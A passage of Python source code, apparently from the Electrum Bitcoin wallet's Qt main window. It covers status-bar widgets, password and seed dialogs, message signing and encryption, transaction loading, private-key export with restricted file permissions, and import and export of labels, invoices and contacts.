            callback=lambda: self.console.set_json(True))
        methods = {}
        def mkfunc(f, method):
            # bind each command name in its own closure (not late-bound)
            return lambda *args, **kwargs: f(method,
                                             args,
                                             self.password_dialog,
                                             **{**kwargs, 'wallet': self.wallet})
        for m in dir(c):
            # skip private attrs and names already provided in the namespace
            if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
            methods[m] = mkfunc(c._run, m)
        console.updateNamespace(methods)
    def create_status_bar(self):
        """Build the main window status bar: balance label, search box,
        update-check button, and the password/preferences/seed/lightning/
        network permanent buttons."""
        sb = QStatusBar()
        sb.setFixedHeight(35)
        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)
        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)
        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)
        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
        sb.addPermanentWidget(self.password_button)
        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
        sb.addPermanentWidget(self.seed_button)
        self.lightning_button = None
        if self.wallet.has_lightning():
            self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
            self.update_lightning_icon()
            sb.addPermanentWidget(self.lightning_button)
        self.status_button = None
        if self.network:
            self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
            sb.addPermanentWidget(self.status_button)
        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
    """Create and return the (initially hidden) coin-control status bar."""
    bar = QStatusBar()
    self.coincontrol_sb = bar
    bar.setSizeGripEnabled(False)
    # green background marks coin-control mode as active
    bar.setStyleSheet('QStatusBar::item {border: None;} '
                      + ColorScheme.GREEN.as_stylesheet(True))
    label = QLabel()
    label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
    label.setTextInteractionFlags(Qt.TextSelectableByMouse)
    self.coincontrol_label = label
    bar.addWidget(label)
    reset_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
    reset_button.setStyleSheet("margin-right: 5px;")
    bar.addPermanentWidget(reset_button)
    bar.setVisible(False)
    return bar
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
    """Show *msg* in the coin-control bar; hide the bar when msg is falsy."""
    if msg:
        self.coincontrol_label.setText(msg)
        self.coincontrol_sb.setVisible(True)
    else:
        self.coincontrol_label.setText("")
        self.coincontrol_sb.setVisible(False)
def update_lightning_icon(self):
    """Refresh the lightning status-bar button from gossip sync progress."""
    if self.lightning_button is None:
        return
    # no channel_db means gossip is not running: hide the button entirely
    if self.network is None or self.network.channel_db is None:
        self.lightning_button.setVisible(False)
        return
    self.lightning_button.setVisible(True)
    cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
    # self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
    progress_str = f"{progress_percent}%" if progress_percent is not None else "??%"
    if progress_percent and progress_percent >= 100:
        # fully synced: shrink to icon-only
        self.lightning_button.setMaximumWidth(25)
        self.lightning_button.setText('')
        self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
    else:
        self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
        self.lightning_button.setText(progress_str)
        self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
                                           "Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
    """Show a locked or unlocked padlock depending on wallet password state."""
    name = "lock.png" if self.wallet.has_password() else "unlock.png"
    self.password_button.setIcon(read_QIcon(name))
def update_buttons_on_seed(self):
    """Toggle seed/password status-bar buttons to match wallet capabilities."""
    wallet = self.wallet
    self.seed_button.setVisible(wallet.has_seed())
    self.password_button.setVisible(wallet.may_have_password())
def change_password_dialog(self):
    """Let the user set, change or remove the wallet password.

    Wallets whose storage encryption is derived from the hardware device
    (XPUB_PASSWORD) use a dedicated dialog: the "password" is fetched
    from the device rather than typed by the user.
    """
    from electrum.storage import StorageEncryptionVersion
    if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
        from .password_dialog import ChangePasswordDialogForHW
        d = ChangePasswordDialogForHW(self, self.wallet)
        ok, encrypt_file = d.run()
        if not ok:
            return
        try:
            hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
        except UserCancelled:
            # user aborted on the device; treat as a plain cancel
            return
        except BaseException as e:
            self.logger.exception('')
            self.show_error(repr(e))
            return
        # the device-derived secret serves as both old and new password
        old_password = hw_dev_pw if self.wallet.has_password() else None
        new_password = hw_dev_pw if encrypt_file else None
    else:
        from .password_dialog import ChangePasswordDialogForSW
        d = ChangePasswordDialogForSW(self, self.wallet)
        ok, old_password, new_password, encrypt_file = d.run()
        if not ok:
            return
    try:
        self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
    except InvalidPassword as e:
        self.show_error(str(e))
        return
    except BaseException:
        self.logger.exception('Failed to update password')
        self.show_error(_('Failed to update password'))
        return
    msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
    self.show_message(msg, title=_("Success"))
    self.update_lock_icon()
def toggle_search(self):
    """Show/hide the status-bar search box; clears the filter when hiding."""
    box = self.search_box
    box.setHidden(not box.isHidden())
    if box.isHidden():
        self.do_search('')  # reset any active filter
    else:
        box.setFocus(1)  # focus reason passed as int, as in the original code
def do_search(self, t):
    """Apply filter text *t* to the active tab's list, if it is searchable."""
    current = self.tabs.currentWidget()
    if hasattr(current, 'searchable_list'):
        current.searchable_list.filter(t)
def new_contact_dialog(self):
    """Modal dialog asking for an address and a name; saves the contact on OK."""
    d = WindowModalDialog(self, _("New Contact"))
    vbox = QVBoxLayout(d)
    vbox.addWidget(QLabel(_('New Contact') + ':'))
    grid = QGridLayout()
    line1 = QLineEdit()  # address field
    line1.setFixedWidth(32 * char_width_in_lineedit())
    line2 = QLineEdit()  # name field
    line2.setFixedWidth(32 * char_width_in_lineedit())
    grid.addWidget(QLabel(_("Address")), 1, 0)
    grid.addWidget(line1, 1, 1)
    grid.addWidget(QLabel(_("Name")), 2, 0)
    grid.addWidget(line2, 2, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if d.exec_():
        # set_contact takes (name, address)
        self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self):
    """Ask for confirmation, then create lightning keys for this wallet."""
    # NOTE(review): "everytime you create a new wallet" in the warning below
    # likely should read "a new channel" (cf. the backup warnings in
    # show_wallet_info) -- confirm before changing the user-facing text.
    confirmed = self.question(_(
        "Warning: this wallet type does not support channel recovery from seed. "
        "You will need to backup your wallet everytime you create a new wallet. "
        "Create lightning keys?"))
    if not confirmed:
        return
    self.wallet.init_lightning()
    self.show_message("Lightning keys created. Please restart Electrum")
def show_wallet_info(self):
    """Modal dialog summarizing wallet metadata.

    Shows name, type, script type, seed availability, lightning status
    (with node id and backup caveats), and for deterministic wallets the
    master public key(s) and derivation path per keystore.
    """
    dialog = WindowModalDialog(self, _("Wallet Information"))
    dialog.setMinimumSize(800, 100)
    vbox = QVBoxLayout()
    wallet_type = self.wallet.db.get('wallet_type', '')
    if self.wallet.is_watching_only():
        wallet_type += ' [{}]'.format(_('watching-only'))
    seed_available = _('True') if self.wallet.has_seed() else _('False')
    keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
    grid = QGridLayout()
    basename = os.path.basename(self.wallet.storage.path)
    grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
    grid.addWidget(QLabel(basename), 0, 1)
    grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
    grid.addWidget(QLabel(wallet_type), 1, 1)
    grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
    grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
    grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
    grid.addWidget(QLabel(str(seed_available)), 3, 1)
    if len(keystore_types) <= 1:
        # multisig wallets list their keystores in the section below instead
        grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
        ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
        grid.addWidget(QLabel(ks_type), 4, 1)
    # lightning
    grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
    from .util import IconLabel
    if self.wallet.has_lightning():
        if self.wallet.lnworker.has_deterministic_node_id():
            grid.addWidget(QLabel(_('Enabled')), 5, 1)
        else:
            # non-recoverable channels: warn and explain why
            label = IconLabel(text='Enabled, non-recoverable channels')
            label.setIcon(read_QIcon('nocloud'))
            grid.addWidget(label, 5, 1)
            if self.wallet.db.get('seed_type') == 'segwit':
                msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
                        "This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
                        "If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
            else:
                msg = _("Your channels cannot be recovered from seed. "
                        "This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
                        "If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
            grid.addWidget(HelpButton(msg), 5, 3)
        grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0)
        # TODO: ButtonsLineEdit should have a addQrButton method
        nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
        nodeid_e = ButtonsLineEdit(nodeid_text)
        qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
        nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
        nodeid_e.addCopyButton(self.app)
        nodeid_e.setReadOnly(True)
        nodeid_e.setFont(QFont(MONOSPACE_FONT))
        grid.addWidget(nodeid_e, 8, 0, 1, 4)
    else:
        if self.wallet.can_have_lightning():
            grid.addWidget(QLabel('Not enabled'), 5, 1)
            button = QPushButton(_("Enable"))
            button.pressed.connect(self.init_lightning_dialog)
            grid.addWidget(button, 5, 3)
        else:
            grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
            grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
    vbox.addLayout(grid)
    # NOTE(review): labels_clayout is assigned but never read after the loop
    labels_clayout = None
    if self.wallet.is_deterministic():
        keystores = self.wallet.get_keystores()
        ks_stack = QStackedWidget()
        def select_ks(index):
            ks_stack.setCurrentIndex(index)
        # only show the combobox in case multiple accounts are available
        if len(keystores) > 1:
            def label(idx, ks):
                if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
                    return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
                else:
                    return _("keystore") + f' {idx+1}'
            labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
            on_click = lambda clayout: select_ks(clayout.selected_index())
            labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
            vbox.addLayout(labels_clayout.layout())
        for ks in keystores:
            # one stacked page per keystore: master public key + derivation path
            ks_w = QWidget()
            ks_vbox = QVBoxLayout()
            ks_vbox.setContentsMargins(0, 0, 0, 0)
            ks_w.setLayout(ks_vbox)
            mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
            mpk_text.setMaximumHeight(150)
            mpk_text.addCopyButton(self.app)
            run_hook('show_xpub_button', mpk_text, ks)
            der_path_hbox = QHBoxLayout()
            der_path_hbox.setContentsMargins(0, 0, 0, 0)
            der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
            der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
            der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
            der_path_hbox.addWidget(der_path_text)
            der_path_hbox.addStretch()
            ks_vbox.addWidget(QLabel(_("Master Public Key")))
            ks_vbox.addWidget(mpk_text)
            ks_vbox.addLayout(der_path_hbox)
            ks_stack.addWidget(ks_w)
        select_ks(0)
        vbox.addWidget(ks_stack)
    vbox.addStretch(1)
    btn_export_info = run_hook('wallet_info_buttons', self, dialog)
    btn_close = CloseButton(dialog)
    btns = Buttons(btn_export_info, btn_close)
    vbox.addLayout(btns)
    dialog.setLayout(vbox)
    dialog.exec_()
def remove_wallet(self):
    """Ask for confirmation, then delete the wallet file from disk."""
    prompt = '\n'.join([
        _('Delete wallet file?'),
        "%s" % self.wallet.storage.path,
        _('If your wallet contains funds, make sure you have saved its seed.'),
    ])
    if self.question(prompt):
        self._delete_wallet()
@protected
def _delete_wallet(self, password):
    """Delete the wallet file via the daemon and close this window.

    @protected: the password argument is supplied by the password dialog
    when the wallet is encrypted.
    """
    path = self.wallet.storage.path
    name = os.path.basename(path)
    deleted = self.gui_object.daemon.delete_wallet(path)
    self.close()
    if deleted:
        self.show_error(_("Wallet removed: {}").format(name))
    else:
        self.show_error(_("Wallet file not found: {}").format(name))
@protected
def show_seed_dialog(self, password):
    """Show the wallet's seed words (and optional passphrase) in a dialog.

    No-op with a message box if this wallet type has no seed. @protected:
    password is supplied by the password prompt.
    """
    if not self.wallet.has_seed():
        self.show_message(_('This wallet has no seed'))
        return
    ks = self.wallet.get_keystore()
    try:
        seed = ks.get_seed(password)
        passphrase = ks.get_passphrase(password)
    except BaseException as exc:
        self.show_error(repr(exc))
        return
    from .seed_dialog import SeedDialog
    SeedDialog(self, seed, passphrase, config=self.config).exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
                help_text=None, show_copy_text_btn=False):
    """Display *data* as a QR code in a modal dialog; no-op for empty data.

    Note: the default title is translated once, at class-definition time.
    """
    if not data:
        return
    d = QRDialog(
        data=data,
        parent=parent or self,
        title=title,
        help_text=help_text,
        show_copy_text_btn=show_copy_text_btn,
        config=self.config,
    )
    d.exec_()
@protected
def show_private_key(self, address, password):
    """Display the private key (with QR/copy widgets) for one address.

    @protected: password is supplied by the password prompt.
    """
    if not address:
        return
    try:
        pk = self.wallet.export_private_key(address, password)
    except Exception as e:
        self.logger.exception('')
        self.show_message(repr(e))
        return
    # first element of deserialize_privkey() is the script type
    xtype = bitcoin.deserialize_privkey(pk)[0]
    d = WindowModalDialog(self, _("Private key"))
    d.setMinimumSize(600, 150)
    vbox = QVBoxLayout()
    vbox.addWidget(QLabel(_("Address") + ': ' + address))
    vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
    vbox.addWidget(QLabel(_("Private key") + ':'))
    keys_e = ShowQRTextEdit(text=pk, config=self.config)
    keys_e.addCopyButton(self.app)
    vbox.addWidget(keys_e)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.setLayout(vbox)
    d.exec_()
# Shown by do_sign() when the entered address type has no unique public key
# (class-level constant; translated once at class-definition time).
msg_sign = _("Signing with an address actually means signing with the corresponding "
             "private key, and verifying with the corresponding public key. The "
             "address you have entered does not have a unique public key, so these "
             "operations cannot be performed.") + '\n\n' + \
           _('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
    """Sign *message* with *address*'s key on the wallet's worker thread.

    address/message/signature are the dialog's input widgets; on success the
    base64-encoded signature is written into the signature widget.
    @protected: password is supplied by the password prompt.
    """
    address = address.text().strip()
    message = message.toPlainText().strip()
    if not bitcoin.is_address(address):
        self.show_message(_('Invalid Bitcoin address.'))
        return
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    if not self.wallet.is_mine(address):
        self.show_message(_('Address not in wallet.'))
        return
    txin_type = self.wallet.get_txin_type(address)
    if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
        # only address types with a unique public key can sign messages
        self.show_message(_('Cannot sign messages with this type of address:') + \
                          ' ' + txin_type + '\n\n' + self.msg_sign)
        return
    task = partial(self.wallet.sign_message, address, message, password)
    def show_signed_message(sig):
        # runs back on the GUI side once signing finished
        try:
            signature.setText(base64.b64encode(sig).decode('ascii'))
        except RuntimeError:
            # (signature) wrapped C/C++ object has been deleted
            pass
    self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
    """Verify a signed message; the arguments are the dialog's input widgets."""
    addr = address.text().strip()
    msg_bytes = message.toPlainText().strip().encode('utf-8')
    if not bitcoin.is_address(addr):
        self.show_message(_('Invalid Bitcoin address.'))
        return
    verified = False
    try:
        # b64decode raises on malformed input; treated as "wrong signature"
        sig = base64.b64decode(str(signature.toPlainText()))
        verified = ecc.verify_message_with_address(addr, sig, msg_bytes)
    except Exception:
        verified = False
    if verified:
        self.show_message(_("Signature verified"))
    else:
        self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
    """Open the sign/verify-message dialog, optionally pre-filling *address*."""
    d = WindowModalDialog(self, _('Sign/verify Message'))
    d.setMinimumSize(610, 290)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    address_e = QLineEdit()
    address_e.setText(address)
    layout.addWidget(QLabel(_('Address')), 2, 0)
    layout.addWidget(address_e, 2, 1)
    signature_e = QTextEdit()
    signature_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Signature')), 3, 0)
    layout.addWidget(signature_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    # the widgets themselves are passed to do_sign/do_verify, which read them
    b = QPushButton(_("Sign"))
    b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Verify"))
    b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
    """Decrypt the ciphertext widget's text on the wallet's worker thread.

    On success the plaintext is written into the message widget.
    @protected: password is supplied by the password prompt.
    """
    if self.wallet.is_watching_only():
        self.show_message(_('This is a watching-only wallet.'))
        return
    cyphertext = encrypted_e.toPlainText()
    task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
    def setText(text):
        # runs back on the GUI side once decryption finished
        try:
            message_e.setText(text.decode('utf-8'))
        except RuntimeError:
            # (message_e) wrapped C/C++ object has been deleted
            pass
    self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
    """Encrypt the message widget's text to the given public key."""
    plaintext = message_e.toPlainText().encode('utf-8')
    try:
        pubkey = ecc.ECPubkey(bfh(pubkey_e.text()))
    except BaseException:
        self.logger.exception('Invalid Public key')
        self.show_warning(_('Invalid Public key'))
        return
    ciphertext = pubkey.encrypt_message(plaintext)
    encrypted_e.setText(ciphertext.decode('ascii'))
def encrypt_message(self, address=''):
    """Open the encrypt/decrypt-message dialog.

    If *address* is given, its public key is pre-filled.
    """
    d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
    d.setMinimumSize(610, 490)
    layout = QGridLayout(d)
    message_e = QTextEdit()
    message_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Message')), 1, 0)
    layout.addWidget(message_e, 1, 1)
    layout.setRowStretch(2,3)
    pubkey_e = QLineEdit()
    if address:
        pubkey = self.wallet.get_public_key(address)
        pubkey_e.setText(pubkey)
    layout.addWidget(QLabel(_('Public key')), 2, 0)
    layout.addWidget(pubkey_e, 2, 1)
    encrypted_e = QTextEdit()
    encrypted_e.setAcceptRichText(False)
    layout.addWidget(QLabel(_('Encrypted')), 3, 0)
    layout.addWidget(encrypted_e, 3, 1)
    layout.setRowStretch(3,1)
    hbox = QHBoxLayout()
    # the widgets themselves are passed to do_encrypt/do_decrypt
    b = QPushButton(_("Encrypt"))
    b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Decrypt"))
    b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
    hbox.addWidget(b)
    b = QPushButton(_("Close"))
    b.clicked.connect(d.accept)
    hbox.addWidget(b)
    layout.addLayout(hbox, 4, 1)
    d.exec_()
def password_dialog(self, msg=None, parent=None):
    """Prompt for a password; returns the entered password, or None on cancel."""
    from .password_dialog import PasswordDialog
    owner = parent or self
    return PasswordDialog(owner, msg).run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
    """Parse raw/partial transaction data; shows an error and returns None on failure."""
    from electrum.transaction import tx_from_any
    try:
        return tx_from_any(data)
    except BaseException as e:
        self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
        return None
def import_channel_backup(self, encrypted: str):
    """Import an encrypted lightning channel backup after user confirmation."""
    if not self.question('Import channel backup?'):
        return
    try:
        self.wallet.lnworker.import_channel_backup(encrypted)
    except Exception as exc:
        self.show_error("failed to import backup" + '\n' + str(exc))
        return
def read_tx_from_qrcode(self):
    """Scan a QR code from the camera and dispatch on its content.

    Handles three payload kinds: a BIP21 bitcoin URI, a 'channel_backup:'
    string, and a serialized (e.g. offline-signed) transaction.
    """
    from electrum import qrscanner
    try:
        data = qrscanner.scan_barcode(self.config.get_video_device())
    except UserFacingException as e:
        self.show_error(e)
        return
    except BaseException as e:
        self.logger.exception('camera error')
        self.show_error(repr(e))
        return
    if not data:
        return
    # if the user scanned a bitcoin URI
    if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
        self.pay_to_URI(data)
        return
    if data.lower().startswith('channel_backup:'):
        self.import_channel_backup(data)
        return
    # else if the user scanned an offline signed tx
    tx = self.tx_from_text(data)
    if not tx:
        return
    self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
    """Let the user pick a transaction file and parse it; None on cancel/error."""
    path = getOpenFileName(
        parent=self,
        title=_("Select your transaction file"),
        filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
        config=self.config,
    )
    if not path:
        return None
    try:
        with open(path, "rb") as f:
            raw = f.read()  # type: Union[str, bytes]
    except (ValueError, IOError, os.error) as reason:
        self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
                           title=_("Unable to read file or no transaction found"))
        return None
    return self.tx_from_text(raw)
def do_process_from_text(self):
    """Prompt for a raw transaction as text and show it if it parses."""
    raw = text_dialog(
        parent=self,
        title=_('Input raw transaction'),
        header_layout=_("Transaction:"),
        ok_label=_("Load transaction"),
        config=self.config,
    )
    if raw:
        tx = self.tx_from_text(raw)
        if tx:
            self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
    """Prompt for a channel backup string and import it if well-formed."""
    text = text_dialog(
        parent=self,
        title=_('Input channel backup'),
        header_layout=_("Channel Backup:"),
        ok_label=_("Load backup"),
        config=self.config,
    )
    if text and text.startswith('channel_backup:'):
        self.import_channel_backup(text)
def do_process_from_file(self):
    """Load a transaction from a user-chosen file and display it."""
    tx = self.read_tx_from_file()
    if tx:
        self.show_transaction(tx)
def do_process_from_txid(self):
    """Ask for a txid, fetch the raw tx from the network, and display it."""
    from electrum import transaction
    txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
    if not (ok and txid):
        return
    raw_tx = self._fetch_tx_from_network(str(txid).strip())
    if raw_tx:
        self.show_transaction(transaction.Transaction(raw_tx))
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
    """Fetch a raw transaction by txid from the connected server.

    Returns the raw tx, or None (after informing the user) when offline
    or on server error.
    """
    if not self.network:
        self.show_message(_("You are offline."))
        return None
    try:
        raw_tx = self.network.run_from_another_thread(
            self.network.get_transaction(txid, timeout=10))
    except UntrustedServerReturnedError as e:
        self.logger.info(f"Error getting transaction from network: {repr(e)}")
        self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
        return None
    except Exception as e:
        self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
        return None
    return raw_tx
@protected
def export_privkeys_dialog(self, password):
    """Export all wallet private keys to a CSV/JSON file.

    Keys are derived on a background thread (one address at a time, with a
    short sleep between them) while the dialog shows progress; the export
    file is written only after the user confirms.
    @protected: password is supplied by the password prompt.
    """
    if self.wallet.is_watching_only():
        self.show_message(_("This is a watching-only wallet"))
        return
    if isinstance(self.wallet, Multisig_Wallet):
        self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
                          _('It cannot be "backed up" by simply exporting these private keys.'))
    d = WindowModalDialog(self, _('Private keys'))
    d.setMinimumSize(980, 300)
    vbox = QVBoxLayout(d)
    msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
                          _("Exposing a single private key can compromise your entire wallet!"),
                          _("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
    vbox.addWidget(QLabel(msg))
    e = QTextEdit()  # shows progress first, then the derived keys
    e.setReadOnly(True)
    vbox.addWidget(e)
    defaultname = 'electrum-private-keys.csv'
    select_msg = _('Select file to export your private keys to')
    hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
    vbox.addLayout(hbox)
    b = OkButton(d, _('Export'))
    b.setEnabled(False)  # enabled once all keys have been derived
    vbox.addLayout(Buttons(CancelButton(d), b))
    private_keys = {}
    addresses = self.wallet.get_addresses()
    done = False
    cancelled = False
    def privkeys_thread():
        # background worker: derive one key per address, signalling the GUI
        for addr in addresses:
            time.sleep(0.1)  # throttle so the GUI stays responsive
            if done or cancelled:
                break
            privkey = self.wallet.export_private_key(addr, password)
            private_keys[addr] = privkey
            self.computing_privkeys_signal.emit()
        if not cancelled:
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.emit()
    def show_privkeys():
        # GUI side: render "address<TAB>privkey" lines and enable Export
        s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
        e.setText(s)
        b.setEnabled(True)
        self.show_privkeys_signal.disconnect()
        nonlocal done
        done = True
    def on_dialog_closed(*args):
        nonlocal done
        nonlocal cancelled
        if not done:
            # user closed the dialog before derivation finished
            cancelled = True
            self.computing_privkeys_signal.disconnect()
            self.show_privkeys_signal.disconnect()
    self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
    self.show_privkeys_signal.connect(show_privkeys)
    d.finished.connect(on_dialog_closed)
    threading.Thread(target=privkeys_thread).start()
    if not d.exec_():
        done = True
        return
    filename = filename_e.text()
    if not filename:
        return
    try:
        self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
    except (IOError, os.error) as reason:
        txt = "\n".join([
            _("Electrum was unable to produce a private key-export."),
            str(reason)
        ])
        self.show_critical(txt, title=_("Unable to create csv"))
    except Exception as e:
        self.show_message(repr(e))
        return
    self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
    """Write exported private keys to *fileName*.

    pklist maps address -> WIF private key. If is_csv, writes a CSV with
    header ["address", "private_key"] and addresses right-padded to 34
    characters (the historical format); otherwise writes indented JSON.

    Fix: the file is now created with 0o600 permissions atomically via
    os.open. Previously it was opened with regular permissions and only
    chmod'ed afterwards, leaving a window in which other local users
    could read the private keys.
    """
    # O_TRUNC so an existing file is overwritten, like open(..., "w+") did.
    fd = os.open(fileName, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        # the mode in os.open() only applies to newly created files;
        # also tighten a pre-existing file, matching the old behaviour
        os.chmod(fileName, 0o600)
        if is_csv:
            writer = csv.writer(f)
            writer.writerow(["address", "private_key"])
            for addr, pk in pklist.items():
                writer.writerow(["%34s" % addr, pk])
        else:
            f.write(json.dumps(pklist, indent=4))
def do_import_labels(self):
    """Import address/tx labels via the generic import-meta dialog."""
    def on_import():
        # request a redraw so the imported labels become visible
        self.need_update.set()
    import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
    """Export all labels via the generic export-meta dialog."""
    export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
    """Import invoices, then refresh the invoice list."""
    import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
    """Export invoices to a user-chosen file."""
    export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
    """Import payment requests, then refresh the request list."""
    import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
    """Export payment requests to a user-chosen file."""
    export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
    """Import contacts, then refresh the contact list."""
    import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
    """Export contacts to a user-chosen file."""
    export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
    """Dialog for sweeping funds from raw private keys into a wallet address.

    The Sweep button stays disabled until both the pasted keys and the
    destination address validate; the sweep inputs are gathered on a
    network thread behind a WaitingDialog, then handed to the normal
    on-chain payment dialog.
    """
    d = WindowModalDialog(self, title=_('Sweep private keys'))
    d.setMinimumSize(600, 300)
    vbox = QVBoxLayout(d)
    hbox_top = QHBoxLayout()
    hbox_top.addWidget(QLabel(_("Enter private keys:")))
